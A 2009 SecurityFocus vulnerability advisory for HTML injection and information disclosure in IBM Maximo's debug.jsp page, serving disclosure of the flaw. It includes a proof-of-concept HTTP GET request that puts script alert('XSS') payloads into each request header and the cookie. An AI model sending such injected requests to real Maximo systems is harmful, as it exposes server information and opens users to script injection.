Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

IBM Maximo 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities

Attackers can exploit these issues by using a browser or standard tools.

The following proof-of-concept HTTP GET request is available for the information-disclosure issue:

GET /jsp/common/system/debug.jsp HTTP/1.1
Accept: <script>alert('XSS');</script>
Accept-Language: <script>alert('XSS');</script>
UA-CPU: <script>alert('XSS');</script>
Accept-Encoding: <script>alert('XSS');</script>
User-Agent: <script>alert('XSS');</script>
Host: maximo
Connection: Keep-Alive
Cookie: <script>alert('XSS');</script>







 

Privacy Statement
Copyright 2009, SecurityFocus